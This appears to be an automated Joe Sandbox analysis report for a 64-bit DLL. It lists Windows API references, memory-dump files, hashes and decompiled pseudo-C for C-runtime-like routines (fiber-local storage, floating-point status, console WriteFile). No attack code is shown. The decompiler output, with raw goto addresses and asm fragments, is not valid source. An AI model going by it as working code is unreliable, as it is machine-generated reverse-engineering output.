FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBACF
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBAE0
SetLastError.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBAFB

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
Instruction ID: 2e40ce26676b10653fd03f50feabe36d0d8e9feeb1ef8306c5688537e4d99ac9
Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
Instruction Fuzzy Hash: C9111520E0D64782FA646F72B9621392242DF4F7B0F04CB35E96E077D6EE6EB4658200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F9C24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFA094F9C49
GetProcAddress.KERNEL32 ref: 00007FFA094F9C5F
FreeLibrary.KERNEL32 ref: 00007FFA094F9C86

Strings

mscoree.dll, xrefs: 00007FFA094F9C40
CorExitProcess, xrefs: 00007FFA094F9C58

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction ID: a09c0b42e12eb28b0bb3c5cf305ff5602741936c1fd6575701700b17c97b0f31
Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction Fuzzy Hash: 1DF04961A18A0281EB108F75B8643796364EF9FBA1F548235DA6E463E4CF3DE048C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FEB68 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFA7FFA094FEB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x94feb9a;
				if (sil >= 0) goto 0x94feb9a;
				E00007FFA7FFA09501CEC(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x94febf1;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x94febb5;
				asm("dec eax");
				if (_t42 >= 0) goto 0x94febb5;
				E00007FFA7FFA09501CEC(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x94febf1;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x94febd1;
				asm("dec eax");
				if (_t43 >= 0) goto 0x94febd1;
				E00007FFA7FFA09501CEC(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x94febf1;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x94febf1;
				asm("dec eax");
				if (_t44 >= 0) goto 0x94febf1;
				if ((dil & 0x00000010) == 0) goto 0x94febee;
				E00007FFA7FFA09501CEC(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x94fec0b;
				asm("dec eax");
				if (_t46 >= 0) goto 0x94fec0b;
				E00007FFA7FFA09501CEC(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x7ffa094feb68
0x7ffa094feb6d
0x7ffa094feb7c
0x7ffa094feb84
0x7ffa094feb89
0x7ffa094feb90
0x7ffa094feb95
0x7ffa094feb98
0x7ffa094feb9f
0x7ffa094feba2
0x7ffa094feba4
0x7ffa094feba9
0x7ffa094febab
0x7ffa094febb0
0x7ffa094febb3
0x7ffa094febb5
0x7ffa094febb9
0x7ffa094febbb
0x7ffa094febc0
0x7ffa094febc7
0x7ffa094febcc
0x7ffa094febcf
0x7ffa094febd1
0x7ffa094febd5
0x7ffa094febd7
0x7ffa094febdc
0x7ffa094febe2
0x7ffa094febe9
0x7ffa094febee
0x7ffa094febf1
0x7ffa094febf5
0x7ffa094febf7
0x7ffa094febfc
0x7ffa094fec03
0x7ffa094fec21

APIs

_set_statfp.LIBCMT ref: 00007FFA094FEB90
_set_statfp.LIBCMT ref: 00007FFA094FEBAB
_set_statfp.LIBCMT ref: 00007FFA094FEBC7
_set_statfp.LIBCMT ref: 00007FFA094FEC03

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction ID: 9bd36bb4b18627d5455ec912ef4d486b1c92e00a26dd0ce0cde72c2af119c7a2
Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction Fuzzy Hash: 8C11BF26E4CA5301F6649F79F4B637A10847F9E361E04C635FA6F063E78E2DE855C109

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FBB14 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB33
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB52
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB7A
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB8B
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB9C

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
Instruction ID: 10a00e44a990ae904e3b1df26d3b5318f9e29c708a6af767d76d523375c91811
Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
Instruction Fuzzy Hash: AC113D10E0D64741FA585F32B96227952469F4F7B0F04C734D86D07BDAEE2DF465C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FB9A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFA094FB9B9
FlsSetValue.KERNEL32 ref: 00007FFA094FB9D8
FlsSetValue.KERNEL32 ref: 00007FFA094FBA00
FlsSetValue.KERNEL32 ref: 00007FFA094FBA11
FlsSetValue.KERNEL32 ref: 00007FFA094FBA22

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
Instruction ID: ded19aec08f10648ea1859b9e107d1c583bb15e13c143476744dbc17ba014841
Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
Instruction Fuzzy Hash: 5611C524E0D60742F968AF32B86267A12418F4F770F18CB34D83E0A7D2EE2EB465D204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09500958 Relevance: 6.3, APIs: 4, Instructions: 305
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA09500958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t181;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t263;
				signed long long _t264;
				signed long long _t267;
				long long _t269;
				signed long long _t271;
				long long _t276;
				long long _t278;
				long long _t280;
				intOrPtr* _t289;
				intOrPtr _t294;
				long long _t295;
				long long _t318;
				void* _t326;
				long long _t327;
				void* _t328;
				long long _t329;
				long long _t331;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				intOrPtr* _t335;
				void* _t336;
				void* _t337;
				signed long long _t338;
				intOrPtr _t341;
				signed long long _t343;
				void* _t345;
				intOrPtr* _t347;
				intOrPtr _t351;
				signed long long _t356;
				signed long long _t359;
				signed long long _t361;
				void* _t364;
				long long _t365;
				long long _t367;
				char _t368;
				void* _t372;
				signed char* _t373;
				signed long long _t375;

				_t263 = _t337;
				_t336 = _t263 - 0x57;
				_t338 = _t337 - 0xe0;
				 *((long long*)(_t336 - 9)) = 0xfffffffe;
				 *((long long*)(_t263 + 8)) = __rbx;
				_t264 =  *0x956e008; // 0x53c008c84601
				 *(_t336 + 0x17) = _t264 ^ _t338;
				 *((long long*)(_t336 - 0x49)) = __r8;
				_t289 = __rcx;
				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
				 *((long long*)(_t336 - 0x51)) = _t367;
				 *(_t336 - 0x19) = __edx;
				_t267 = __edx >> 6;
				 *(_t336 - 0x59) = _t267;
				 *(_t336 - 0x11) = __edx;
				_t375 = __edx + __edx * 8;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
				 *((long long*)(_t336 - 0x29)) = _t269;
				r12d = r9d;
				_t365 = _t364 + __r8;
				 *((long long*)(_t336 - 0x71)) = _t365;
				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x95009f8;
				0x94f9140();
				_t294 =  *((intOrPtr*)(_t367 + 0x18));
				r8d =  *(_t294 + 0xc);
				 *(_t336 - 0x5d) = r8d;
				 *((long long*)(__rcx)) = _t269;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x9500db8;
				_t271 = __edx >> 6;
				 *(_t336 - 0x21) = _t271;
				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0x9500bc0;
				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t271 * 8));
				if ( *_t347 == dil) goto 0x9500a74;
				_t372 = _t329 + 1;
				if (_t372 - 5 < 0) goto 0x9500a61;
				if (_t372 == 0) goto 0x9500b52;
				r12d =  *((char*)(_t294 + 0x7ffa0956e8f0));
				r12d = r12d + 1;
				_t181 = r12d - 1;
				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
				_t341 = _t181;
				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x9500d27;
				_t295 = _t329;
				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
				if (_t295 + 1 - _t372 < 0) goto 0x9500ab9;
				if (_t341 <= 0) goto 0x9500aea;
				E00007FFA7FFA094F64D0( *( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
				_t318 = _t329;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
				if (_t318 + 1 - _t372 < 0) goto 0x9500aed;
				 *((long long*)(_t336 - 0x41)) = _t329;
				_t276 = _t336 - 1;
				 *((long long*)(_t336 - 0x39)) = _t276;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t338 + 0x20)) = _t367;
				E00007FFA7FFA09501744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
				if (_t276 == 0xffffffff) goto 0x9500db8;
				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
				goto 0x9500c55;
				_t368 =  *((char*)(_t276 + 0x7ffa0956e8f0));
				_t212 = _t368 + 1;
				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
				if (_t212 - _t343 > 0) goto 0x9500d55;
				 *((long long*)(_t336 - 0x69)) = _t329;
				 *((long long*)(_t336 - 0x31)) = _t331;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t278 =  *((intOrPtr*)(_t336 - 0x51));
				 *((long long*)(_t338 + 0x20)) = _t278;
				E00007FFA7FFA09501744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
				if (_t278 == 0xffffffff) goto 0x9500db8;
				_t332 = _t331 + _t368;
				r12d = r14d;
				goto 0x9500c55;
				_t359 =  *(_t336 - 0x59);
				_t351 =  *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t359 * 8));
				_t213 =  *(_t351 + 0x3d + _t375 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0x9500bf7;
				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
				 *((char*)(_t336 + 8)) =  *_t332;
				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0x9500c40;
				r8d =  *_t332 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x9500c3a;
				_t373 =  &(_t332[1]);
				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x9500d93;
				r8d = 2;
				if (E00007FFA7FFA094FE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x9500db8;
				_t333 = _t373;
				goto 0x9500c55;
				_t198 = E00007FFA7FFA094FE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
				if (_t198 == 0xffffffff) goto 0x9500db8;
				_t334 =  &(_t333[1]);
				 *((long long*)(_t338 + 0x38)) = _t329;
				 *((long long*)(_t338 + 0x30)) = _t329;
				 *((intOrPtr*)(_t338 + 0x28)) = 5;
				_t280 = _t336 + 0xf;
				 *((long long*)(_t338 + 0x20)) = _t280;
				r9d = r12d;
				_t345 = _t336 - 0x7d;
				E00007FFA7FFA094FD698();
				r14d = _t198;
				if (_t198 == 0) goto 0x9500db8;
				 *((long long*)(_t338 + 0x20)) = _t329;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x9500db0;
				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x9500db8;
				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x9500d10;
				 *((short*)(_t338 + 0x40)) = 0xd;
				 *((long long*)(_t338 + 0x20)) = _t329;
				_t128 = _t280 - 0xc; // 0x1
				r8d = _t128;
				_t326 = _t338 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x9500db0;
				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x9500db8;
				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x9500db8;
				r8d =  *(_t336 - 0x5d);
				goto 0x9500a23;
				if (_t326 <= 0) goto 0x9500d50;
				_t335 = _t334 - _t373;
				 *((char*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
				if (1 - _t326 < 0) goto 0x9500d2f;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
				goto 0x9500db8;
				if (_t345 <= 0) goto 0x9500d8d;
				_t327 = _t329;
				_t361 =  *(_t336 - 0x19) >> 6;
				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
				_t328 = _t327 + 1;
				if (2 - _t345 < 0) goto 0x9500d6d;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
				goto 0x9500db8;
				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
				 *( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
				_t174 = _t328 + 1; // 0x1
				 *((intOrPtr*)(_t289 + 4)) = _t174;
				goto 0x9500db8;
				 *_t289 = GetLastError();
				return E00007FFA7FFA094F3A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
			}

0x7ffa09500958
0x7ffa09500966
0x7ffa0950096a
0x7ffa09500971
0x7ffa09500979
0x7ffa0950097d
0x7ffa09500987
0x7ffa0950098e
0x7ffa09500995
0x7ffa09500998
0x7ffa0950099c
0x7ffa095009a3
0x7ffa095009aa
0x7ffa095009ae
0x7ffa095009bc
0x7ffa095009c0
0x7ffa095009cc
0x7ffa095009d1
0x7ffa095009d5
0x7ffa095009d8
0x7ffa095009db
0x7ffa095009e5
0x7ffa095009ee
0x7ffa095009f3
0x7ffa095009f8
0x7ffa095009fc
0x7ffa09500a00
0x7ffa09500a06
0x7ffa09500a09
0x7ffa09500a10
0x7ffa09500a19
0x7ffa09500a1d
0x7ffa09500a25
0x7ffa09500a29
0x7ffa09500a2c
0x7ffa09500a40
0x7ffa09500a5b
0x7ffa09500a64
0x7ffa09500a68
0x7ffa09500a72
0x7ffa09500a77
0x7ffa09500a8f
0x7ffa09500a98
0x7ffa09500a9e
0x7ffa09500aa0
0x7ffa09500aaa
0x7ffa09500ab0
0x7ffa09500ab6
0x7ffa09500abc
0x7ffa09500ac9
0x7ffa09500ace
0x7ffa09500ada
0x7ffa09500aea
0x7ffa09500af8
0x7ffa09500b03
0x7ffa09500b05
0x7ffa09500b09
0x7ffa09500b0d
0x7ffa09500b1a
0x7ffa09500b1c
0x7ffa09500b1f
0x7ffa09500b22
0x7ffa09500b33
0x7ffa09500b3c
0x7ffa09500b4a
0x7ffa09500b4d
0x7ffa09500b55
0x7ffa09500b5e
0x7ffa09500b66
0x7ffa09500b6f
0x7ffa09500b75
0x7ffa09500b79
0x7ffa09500b85
0x7ffa09500b87
0x7ffa09500b8a
0x7ffa09500b8d
0x7ffa09500b91
0x7ffa09500ba2
0x7ffa09500bab
0x7ffa09500bb1
0x7ffa09500bb4
0x7ffa09500bbb
0x7ffa09500bc0
0x7ffa09500bc4
0x7ffa09500bcc
0x7ffa09500bd4
0x7ffa09500bdb
0x7ffa09500be0
0x7ffa09500be6
0x7ffa09500beb
0x7ffa09500bf5
0x7ffa09500bf7
0x7ffa09500c07
0x7ffa09500c09
0x7ffa09500c11
0x7ffa09500c1a
0x7ffa09500c2f
0x7ffa09500c35
0x7ffa09500c38
0x7ffa09500c47
0x7ffa09500c4f
0x7ffa09500c55
0x7ffa09500c58
0x7ffa09500c5d
0x7ffa09500c62
0x7ffa09500c6a
0x7ffa09500c6e
0x7ffa09500c73
0x7ffa09500c76
0x7ffa09500c7f
0x7ffa09500c84
0x7ffa09500c89
0x7ffa09500c8f
0x7ffa09500c98
0x7ffa09500cae
0x7ffa09500cbc
0x7ffa09500cc3
0x7ffa09500cce
0x7ffa09500cd5
0x7ffa09500cda
0x7ffa09500ce3
0x7ffa09500ce3
0x7ffa09500ce7
0x7ffa09500cf7
0x7ffa09500d01
0x7ffa09500d07
0x7ffa09500d0a
0x7ffa09500d14
0x7ffa09500d1e
0x7ffa09500d22
0x7ffa09500d2a
0x7ffa09500d2c
0x7ffa09500d3e
0x7ffa09500d4e
0x7ffa09500d50
0x7ffa09500d53
0x7ffa09500d58
0x7ffa09500d5a
0x7ffa09500d61
0x7ffa09500d69
0x7ffa09500d7c
0x7ffa09500d82
0x7ffa09500d8b
0x7ffa09500d8d
0x7ffa09500d91
0x7ffa09500d95
0x7ffa09500da2
0x7ffa09500da8
0x7ffa09500dab
0x7ffa09500dae
0x7ffa09500db6
0x7ffa09500de1

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFA095009DF
WriteFile.KERNEL32 ref: 00007FFA09500CA6
WriteFile.KERNEL32 ref: 00007FFA09500CEF
GetLastError.KERNEL32 ref: 00007FFA09500DB0

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction ID: 9bc12c100ec78fb1f3c9328ed998082a70462ec83fe63131d52e3f491ff1ff95
Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction Fuzzy Hash: 27D1D423B08A8189E751CF7AE4402ED37B9FB5A798B148235CE5D57BD9CE38E45AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0950129C Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FFA7FFA0950129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t169;
				signed long long _t182;
				signed long long _t186;
				signed long long _t189;
				signed long long _t208;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t228;
				signed long long _t229;
				signed short* _t230;
				void* _t231;
				signed short* _t232;

				_t122 = __ebx;
				r15d = r8d;
				_t186 = __r9;
				_t230 = __rdx;
				if (r8d == 0) goto 0x9501599;
				if (__rdx != 0) goto 0x9501303;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t209;
				E00007FFA7FFA094F9674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
				goto 0x950159b;
				_t189 = __ecx >> 6;
				_v120 = _t189;
				_t229 = __ecx + __ecx * 8;
				if (_t210 - 1 - 1 > 0) goto 0x9501339;
				if (( !r15d & 0x00000001) == 0) goto 0x95012cc;
				if (( *( *((intOrPtr*)(0x956f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x950134f;
				r8d = 0x7ffa0956f942;
				E00007FFA7FFA09501E38(r12d);
				_v96 = _t209;
				if (E00007FFA7FFA095016A0(r12d, __ecx) == 0) goto 0x9501485;
